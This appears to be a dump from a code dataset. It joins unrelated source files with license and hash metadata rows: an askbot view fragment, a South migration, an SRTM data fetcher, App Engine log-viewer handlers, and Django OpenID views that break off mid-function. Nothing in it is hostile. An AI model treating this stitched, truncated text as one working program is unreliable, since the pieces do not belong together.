answer.post_type = 'comment'
answer.parent = destination_post
new_comment_count = answer.comments.count() + 1
answer.comment_count = 0
answer_comments = models.Post.objects.get_comments().filter(parent=answer)
answer_comments.update(parent=destination_post)
#why this and not just "save"?
answer.parse_and_save(author=answer.author)
answer.thread.update_answer_count()
answer.parent.comment_count += new_comment_count
answer.parent.save()
answer.thread.reset_cached_data()
else:
message = _(
'Cannot convert, because text has more characters than '
'%(max_chars)s - maximum allowed for comments'
) % {'max_chars': askbot_settings.MAX_COMMENT_LENGTH}
request.user.message_set.create(message=message)
return HttpResponseRedirect(answer.get_absolute_url())
else:
raise Http404
| gpl-3.0 | -7,389,069,209,881,651,000 | 38.794769 | 184 | 0.566008 | false |
kmshi/miroguide | channelguide/channels/migrations/0003_switch_user_ids.py | 1 | 13086 |
from south.db import db
from django.db import models
from channelguide.channels.models import *
class Migration:
no_dry_run = True
def forwards(self, orm):
"Write your forwards migration here"
for channel in orm.Channel.objects.all():
for field in ('owner', 'featured_by', 'moderator_shared_by',
'last_moderated_by'):
value = getattr(channel, '%s_id' % field)
if value:
profile = orm['user_profile.UserProfile'].objects.get(
pk=value)
setattr(channel, field, profile.user)
else:
setattr(channel, field, None)
channel.save()
def backwards(self, orm):
"Write your backwards migration here"
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'user_profile.userprofile': {
'Meta': {'db_table': "'user'"},
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'approved': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'blocked': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'channel_owner_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '100'}),
'email_updates': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'filter_languages': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'fname': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'hashed_password': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'im_type': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'im_username': ('django.db.models.fields.CharField', [], {'max_length': '35'}),
'language': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5'}),
'lname': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'moderator_board_email': ('django.db.models.fields.CharField', [], {'default': "'S'", 'max_length': '1'}),
'role': ('django.db.models.fields.CharField', [], {'default': "'U'", 'max_length': '1'}),
'show_explicit': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'shown_languages': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['labels.Language']"}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'status_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'to_field': "'username'", 'unique': 'True', 'db_column': "'username'"}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'channels.addedchannel': {
'Meta': {'unique_together': "[('channel', 'user')]", 'db_table': "'cg_channel_added'"},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'added_channels'", 'to': "orm['channels.Channel']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'added_channels'", 'to': "orm['auth.User']"})
},
'channels.channel': {
'Meta': {'db_table': "'cg_channel'"},
'adult': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'approved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['labels.Category']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'featured_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'featured_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'feed_etag': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'feed_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'geoip': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'}),
'hi_def': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'channels'", 'db_column': "'primary_language_id'", 'to': "orm['labels.Language']"}),
'last_moderated_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_moderated_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'license': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40'}),
'moderator_shared_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'moderator_shared_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderator_shared_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'channels'", 'to': "orm['auth.User']"}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'publisher': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'N'", 'max_length': '1'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['labels.Tag']"}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '8', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'waiting_for_reply_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'was_featured': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '255'})
},
'channels.item': {
'Meta': {'db_table': "'cg_channel_item'"},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['channels.Channel']"}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '8', 'null': 'True'}),
'thumbnail_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255'})
},
'channels.lastapproved': {
'Meta': {'db_table': "'cg_channel_last_approved'"},
'timestamp': ('django.db.models.fields.DateTimeField', [], {'primary_key': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'labels.category': {
'Meta': {'db_table': "'cg_category'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'on_frontpage': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'})
},
'labels.language': {
'Meta': {'db_table': "'cg_channel_language'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'labels.tag': {
'Meta': {'db_table': "'cg_tag'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['channels']
| agpl-3.0 | 668,921,977,871,084,900 | 76.431953 | 177 | 0.539814 | false |
skdaccess/skdaccess | skdaccess/geo/srtm/cache/data_fetcher.py | 2 | 10677 | # The MIT License (MIT)
# Copyright (c) 2016 Massachusetts Institute of Technology
#
# Authors: Cody Rude, Guillaume Rongier
# This software has been created in projects supported by the US National
# Science Foundation and NASA (PI: Pankratius)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Scikit Data Access imports
from skdaccess.framework.data_class import DataFetcherCache, ImageWrapper
from skdaccess.utilities.support import convertToStr
from skdaccess.utilities.image_util import AffineGlobalCoords, convertBinCentersToEdges
# 3rd party imports
import pandas as pd
import numpy as np
import gdal
from pkg_resources import resource_filename
# Standard library imports
from collections import OrderedDict
from calendar import monthrange
from zipfile import ZipFile
import os
class DataFetcher(DataFetcherCache):
''' DataFetcher for retrieving data from the Shuttle Radar Topography Mission '''
def __init__(self, lat_tile_start, lat_tile_end, lon_tile_start, lon_tile_end,
username, password, arcsecond_sampling = 1, mask_water = True,
store_geolocation_grids=False):
'''
Initialize Data Fetcher
@param lat_tile_start: Latitude of the southwest corner of the starting tile
@param lat_tile_end: Latitude of the southwset corner of the last tile
@param lon_tile_start: Longitude of the southwest corner of the starting tile
@param lon_tile_end: Longitude of the southwest corner of the last tile
@param username: NASA Earth Data username
@param password: NASA Earth Data Password
@param arcsecond_sampling: Sample spacing of the SRTM data, either 1 arc-
second or 3 arc-seconds
@param mask_water: True if the water bodies should be masked, false otherwise
@param store_geolocation_grids: Store grids of latitude and longitude in the metadata
'''
assert arcsecond_sampling == 1 or arcsecond_sampling == 3, "Sampling should be 1 or 3 arc-seconds"
self.lat_tile_start = lat_tile_start
self.lat_tile_end = lat_tile_end
self.lon_tile_start = lon_tile_start
self.lon_tile_end = lon_tile_end
self.username = username
self.password = password
self.arcsecond_sampling = arcsecond_sampling
self.mask_water = mask_water
self.store_geolocation_grids = store_geolocation_grids
self._missing_data_projection = '\n'.join([
'GEOGCS["WGS 84",',
' DATUM["WGS_1984",',
' SPHEROID["WGS 84",6378137,298.257223563,',
' AUTHORITY["EPSG","7030"]],',
' AUTHORITY["EPSG","6326"]],',
' PRIMEM["Greenwich",0,',
' AUTHORITY["EPSG","8901"]],',
' UNIT["degree",0.0174532925199433,',
' AUTHORITY["EPSG","9122"]],',
' AUTHORITY["EPSG","4326"]]'
])
super(DataFetcher, self).__init__()
def output(self):
'''
Generate SRTM data wrapper
@return SRTM Image Wrapper
'''
lat_tile_array = np.arange(self.lat_tile_start, self.lat_tile_end+1)
lon_tile_array = np.arange(self.lon_tile_start, self.lon_tile_end+1)
lat_grid,lon_grid = np.meshgrid(lat_tile_array, lon_tile_array)
lat_grid = lat_grid.ravel()
lon_grid = lon_grid.ravel()
filename_root = '.SRTMGL1.'
base_url = 'https://e4ftl01.cr.usgs.gov/MEASURES/'
folder_root = 'SRTMGL1.003/2000.02.11/'
if self.arcsecond_sampling == 3:
filename_root = '.SRTMGL3.'
folder_root = 'SRTMGL3.003/2000.02.11/'
base_url += folder_root
filename_list = []
for lat, lon in zip(lat_grid, lon_grid):
if lat < 0:
lat_label = 'S'
lat = np.abs(lat)
else:
lat_label = 'N'
if lon < 0:
lon_label = 'W'
lon = np.abs(lon)
else:
lon_label = 'E'
filename_list.append(lat_label + convertToStr(lat, 2) + lon_label + convertToStr(lon, 3) + filename_root + 'hgt.zip')
if self.mask_water == True:
filename_list.append(lat_label + convertToStr(lat, 2) + lon_label + convertToStr(lon, 3) + filename_root + 'num.zip')
# Read in list of available data
srtm_list_filename = 'srtm_gl1.txt'
if self.arcsecond_sampling == 3:
srtm_list_filename = 'srtm_gl3.txt'
srtm_support_filename = resource_filename('skdaccess', os.path.join('support',srtm_list_filename))
available_file_list = open(srtm_support_filename).readlines()
available_file_list = [filename.strip() for filename in available_file_list]
requested_files = pd.DataFrame({'Filename' : filename_list})
requested_files['Valid'] = [ '.'.join(filename.split('.')[0:-2]) in available_file_list for filename in filename_list ]
valid_filename_list = requested_files.loc[ requested_files['Valid']==True, 'Filename'].tolist()
url_list = [base_url + filename for filename in valid_filename_list]
downloaded_file_list = self.cacheData('srtm', url_list, self.username, self.password,
'https://urs.earthdata.nasa.gov')
requested_files.loc[ requested_files['Valid']==True, 'Full Path'] = downloaded_file_list
def getCoordinates(filename):
'''
Determine the longitude and latitude of the lowerleft corner of the input filename
@param in_filename: Input SRTM filename
@return Latitude of southwest corner, Longitude of southwest corner
'''
lat_start = int(filename[1:3])
if filename[0] == 'S':
lat_start *= -1
lon_start = int(filename[4:7])
if filename[3] == 'W':
lon_start *= -1
return lat_start, lon_start
data_dict = OrderedDict()
metadata_dict = OrderedDict()
array_shape = (3601,3601)
if self.arcsecond_sampling == 3:
array_shape = (1201,1201)
file_slice = slice(None)
water_value = 0
if self.mask_water == True:
file_slice = slice(0, -1, 2)
water_value = np.nan
for i in requested_files.index[file_slice]:
hgt_full_path = requested_files.at[i, 'Full Path']
hgt_filename = requested_files.at[i, 'Filename']
label = hgt_filename[:7]
lat_start, lon_start = getCoordinates(hgt_filename)
metadata_dict[label] = OrderedDict()
x_res = 1.0 / (array_shape[0]-1)
y_res = 1.0 / (array_shape[1]-1)
extents = [
lon_start - x_res / 2,
lon_start + 1 + x_res / 2,
lat_start - y_res / 2,
lat_start + 1 + y_res / 2
]
if requested_files.at[i, 'Valid']:
masked_dem_data = np.ones(array_shape)
if self.mask_water == True and requested_files.at[i + 1, 'Valid']:
num_full_path = requested_files.at[i + 1, 'Full Path']
num_filename = requested_files.at[i + 1, 'Full Path']
zipped_num_data = ZipFile(num_full_path)
zipped_num_full_path = zipped_num_data.infolist()[0].filename
num_data = np.frombuffer(zipped_num_data.open(zipped_num_full_path).read(),
np.dtype('uint8')).reshape(array_shape)
masked_dem_data[(num_data == 1) | (num_data == 2)] = water_value
i += 1
zipped_hgt_data = ZipFile(hgt_full_path)
dem_dataset = gdal.Open(hgt_full_path, gdal.GA_ReadOnly)
dem_data = dem_dataset.ReadAsArray()
masked_dem_data *= dem_data
metadata_dict[label]['WKT'] = dem_dataset.GetProjection()
metadata_dict[label]['GeoTransform'] = dem_dataset.GetGeoTransform()
else:
geo_transform = []
geo_transform.append(extents[0])
geo_transform.append(x_res)
geo_transform.append(0)
geo_transform.append(extents[-1])
geo_transform.append(0)
geo_transform.append(-y_res)
metadata_dict[label]['WKT'] = self._missing_data_projection
metadata_dict[label]['GeoTransform'] = geo_transform
masked_dem_data = np.full(shape=array_shape, fill_value=water_value)
i += 1
data_dict[label] = masked_dem_data
metadata_dict[label]['Geolocation'] = AffineGlobalCoords(metadata_dict[label]['GeoTransform'], center_pixels=True)
metadata_dict[label]['extents'] = extents
if self.store_geolocation_grids:
lat_coords, lon_coords = np.meshgrid(np.linspace(lat_start+1, lat_start, array_shape[0]),
np.linspace(lon_start, lon_start+1, array_shape[1]),
indexing = 'ij')
metadata_dict[label]['Latitude'] = lat_coords
metadata_dict[label]['Longitude'] = lon_coords
return ImageWrapper(obj_wrap = data_dict, meta_data = metadata_dict)
| mit | 6,060,677,398,640,232,000 | 39.290566 | 133 | 0.583966 | false |
labkode/rtlv | handlers.py | 1 | 6340 | from google.appengine.ext.db import BadValueError
from google.appengine.api import channel
from google.appengine.api import users
from google.appengine.ext import ndb
import webapp2
import jinja2
import os
import json
from datetime import datetime
import time
from models import Log
from models import System
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class MainHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
systems = System.query().fetch()
template_values = {"systems": systems, "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/index.html")
self.response.write(template.render(template_values))
class SystemHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
system_param = self.request.get('system')
if not system_param:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "Please select a system"}
self.response.write(template.render(template_values))
return
system = System.get_by_id(system_param)
if system is None:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "The system #{0} not exists".format(system_param)}
self.response.write(template.render(template_values))
return
#logs = Log.query(ancestor = system.key).fetch()
logs = []
template_values = {"system":system, "logs": logs, "token": channel.create_channel(system.key.id()), "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/logs.html")
self.response.write(template.render(template_values))
return
class AdminSystemListHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
systems = System.query().fetch()
template_values = {"systems": systems, "message":{"type":"success", "payload":""},"user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/list_system.html")
self.response.write(template.render(template_values))
return
class AdminSystemCreateHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
template = JINJA_ENVIRONMENT.get_template("templates/create_system.html")
self.response.write(template.render({"user": user, "users": users}))
return
def post(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
system_name = self.request.get("name")
system_description = self.request.get("description")
system = System(id = system_name, description = system_description)
key = system.put()
# This is correct but is a hack, other solution is to use a sleep()
must_stop = False
systems = []
while not must_stop:
systems = System.query().fetch()
for system in systems:
if system.key.id() == system_name:
must_stop = True
systems = System.query().fetch()
template_values = {"systems": systems,"message":{"type":"success", "payload":"Created system #{0}".format(key.id())}, "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/list_system.html")
self.response.write(template.render(template_values))
return
class AdminSystemDeleteHandler(webapp2.RequestHandler):
def post(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
system_id = self.request.get("system")
if not system_id:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "Please select a system"}
self.response.write(template.render(template_values))
return
sys = System.get_by_id(system_id)
if sys is None:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "The system #{0} not exists".format(system_id)}
self.response.write(template.render(template_values))
return
sys.key.delete()
# Hack to not use sleep solution
found = True
systems = []
while found:
found = False
systems = System.query().fetch()
print(systems)
for system in systems:
print(system.key.id(),sys.key.id())
if system.key.id() == sys.key.id():
found = True
break
systems = System.query().fetch()
template_values = {"systems": systems, "message":{"type":"success", "payload":"Deleted system #{0}".format(system_id)}, "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/list_system.html")
self.response.write(template.render(template_values))
return
class AdminLogHandler(webapp2.RequestHandler):
def post(self):
try:
log_param = json.loads(self.request.body)
except ValueError as e:
self.response.out.write(e)
self.response.set_status(400)
return
except:
self.response.set_status(500)
return
if not isinstance(log_param, list):
log_param = [log_param]
for log_item in log_param:
log_system = log_item.get("system")
if not log_system:
self.response.out.write("System not found")
self.response.set_status(404)
system = System.get_by_id(log_system)
if not system:
self.response.out.write("System not found")
self.response.set_status(404)
return
try:
log_key = ndb.Key("Log", log_item.get("id"), parent = system.key)
log_msg = log_item.get("msg")
log_level = log_item.get("level")
log_ts = log_item.get("ts")
log = Log(key = log_key, msg = log_msg, level = log_level, ts = log_ts)
# CHANNEL API
channel.send_message(system.key.id(), json.dumps(log.to_dict()))
except BadValueError as e:
self.response.out.write(e)
self.response.set_status(400)
return
return
class HelpHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
template_values = {"user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/help.html")
self.response.write(template.render(template_values))
| agpl-3.0 | 5,098,910,542,018,449,000 | 29.926829 | 151 | 0.699211 | false |
incuna/authentic | authentic2/auth2_auth/auth2_openid/views.py | 1 | 17205 | import urllib
from django_authopenid.forms import OpenidDissociateForm, AssociateOpenID
from django_authopenid.forms import OpenidSigninForm
from django_authopenid import DjangoOpenIDStore
from django_authopenid.models import UserAssociation
from django_authopenid.utils import *
from django_authopenid.views import associate_failure, complete
from django_authopenid.views import _build_context, signin_failure, not_authenticated
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import REDIRECT_FIELD_NAME, login
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.encoding import smart_unicode
from django.views.decorators.csrf import csrf_exempt, csrf_protect
from django.views.generic.simple import redirect_to
from django.contrib import messages
from openid.consumer.consumer import Consumer, SUCCESS, CANCEL, FAILURE, SETUP_NEEDED
from openid.consumer.discover import DiscoveryFailure
from openid.yadis import xri
from authentic2.auth2_auth.auth2_openid import *
OPENID_PROVIDER = ['https://me.yahoo.com//','http://openid.aol.com/','http://.myopenid.com/',
'http://.livejournal.com/','http://www.flickr.com/photos//','http://.wordpress.com/'
'http://.blogspot.com/','http://.pip.verisignlabs.com/','http://.myvidoop.com/'
'http://.pip.verisignlabs.com/','http://claimid.com/']
def signin_success(request, identity_url, openid_response,
redirect_field_name=REDIRECT_FIELD_NAME, **kwargs):
"""
openid signin success.
If the openid is already registered, the user is redirected to
url set par next or in settings with OPENID_REDIRECT_NEXT variable.
If none of these urls are set user is redirectd to /.
if openid isn't registered user is redirected to register page.
"""
openid_ = from_openid_response(openid_response)
openids = request.session.get('openids', [])
openids.append(openid_)
request.session['openids'] = openids
request.session['openid'] = openid_
redirect_to = request.REQUEST.get(redirect_field_name, '')
try:
rel = UserAssociation.objects.get(openid_url__exact = str(openid_))
except:
# try to register this new user
if not redirect_to: # or '//' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
params = urllib.urlencode({ redirect_field_name: redirect_to })
redirect_to = "%s?%s" % (reverse('user_register'), params)
return HttpResponseRedirect(redirect_to)
user_ = rel.user
if user_.is_active:
user_.backend = "django.contrib.auth.backends.ModelBackend"
login(request, user_)
if not redirect_to: # or '//' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
return HttpResponseRedirect(redirect_to)
def mycomplete(request, on_success=None, on_failure=None, return_to=None,
**kwargs):
on_success = on_success or default_on_success
on_failure = on_failure or default_on_failure
consumer = Consumer(request.session, DjangoOpenIDStore())
# make sure params are encoded in utf8
params = dict((k,smart_unicode(v)) for k, v in request.GET.items())
openid_response = consumer.complete(params, return_to)
if not hasattr(request.GET,'openid.identity'):
_openid_url = 'None'
else:
_openid_url = request.GET['openid.identity']
if openid_response.status == SUCCESS:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'success')
return on_success(request, openid_response.identity_url,
openid_response, **kwargs)
elif openid_response.status == CANCEL:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'cancel')
return on_failure(request, 'The request was canceled', **kwargs)
elif openid_response.status == FAILURE:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'failure')
return on_failure(request, openid_response.message, **kwargs)
elif openid_response.status == SETUP_NEEDED:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'setup_needed')
return on_failure(request, 'Setup needed', **kwargs)
else:
assert False, "Bad openid status: %s" % openid_response.status
@csrf_exempt
def complete_signin(request, redirect_field_name=REDIRECT_FIELD_NAME,
openid_form=OpenidSigninForm, auth_form=AuthenticationForm,
on_success=signin_success, on_failure=signin_failure,
extra_context=None):
_openid_form = openid_form
_auth_form = auth_form
_extra_context = extra_context
return mycomplete(request, on_success, on_failure,
get_url_host(request) + reverse('user_complete_signin'),
redirect_field_name=redirect_field_name, openid_form=_openid_form,
auth_form=_auth_form, extra_context=_extra_context)
def ask_openid(request, openid_url, redirect_to, on_failure=None):
on_failure = on_failure or signin_failure
sreg_req = None
ax_req = None
_openid_url = openid_url
trust_root = getattr(
settings, 'OPENID_TRUST_ROOT', get_url_host(request) + '/'
)
if xri.identifierScheme(openid_url) == 'XRI' and getattr(
settings, 'OPENID_DISALLOW_INAMES', False
):
msg = ("i-names are not supported")
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'not_supported')
return on_failure(request, msg)
consumer = Consumer(request.session, DjangoOpenIDStore())
try:
auth_request = consumer.begin(openid_url)
except DiscoveryFailure:
msg = ("The OpenID %s was invalid") % openid_url
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'invalid')
return on_failure(request, msg)
# get capabilities
use_ax, use_sreg = discover_extensions(openid_url)
if use_sreg:
# set sreg extension
# we always ask for nickname and email
sreg_attrs = getattr(settings, 'OPENID_SREG', {})
sreg_attrs.update({ "optional": ['nickname', 'email'] })
sreg_req = sreg.SRegRequest(**sreg_attrs)
if use_ax:
# set ax extension
# we always ask for nickname and email
ax_req = ax.FetchRequest()
ax_req.add(ax.AttrInfo('http://schema.openid.net/contact/email',
alias='email', required=True))
ax_req.add(ax.AttrInfo('http://schema.openid.net/namePerson/friendly',
alias='nickname', required=True))
# add custom ax attrs
ax_attrs = getattr(settings, 'OPENID_AX', [])
for attr in ax_attrs:
if len(attr) == 2:
ax_req.add(ax.AttrInfo(attr[0], required=alias[1]))
else:
ax_req.add(ax.AttrInfo(attr[0]))
if sreg_req is not None:
auth_request.addExtension(sreg_req)
if ax_req is not None:
auth_request.addExtension(ax_req)
redirect_url = auth_request.redirectURL(trust_root, redirect_to)
return HttpResponseRedirect(redirect_url)
@csrf_exempt
@not_authenticated
def signin(request, template_name='authopenid/signin.html',
redirect_field_name=REDIRECT_FIELD_NAME, openid_form=OpenidSigninForm,
auth_form=AuthenticationForm, on_failure=None, extra_context=None):
if on_failure is None:
on_failure = signin_failure
redirect_to = request.REQUEST.get(redirect_field_name, '')
form1 = openid_form()
form2 = auth_form()
if request.POST:
if not redirect_to or '://' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
if 'openid_url' in request.POST.keys():
form1 = openid_form(data=request.POST)
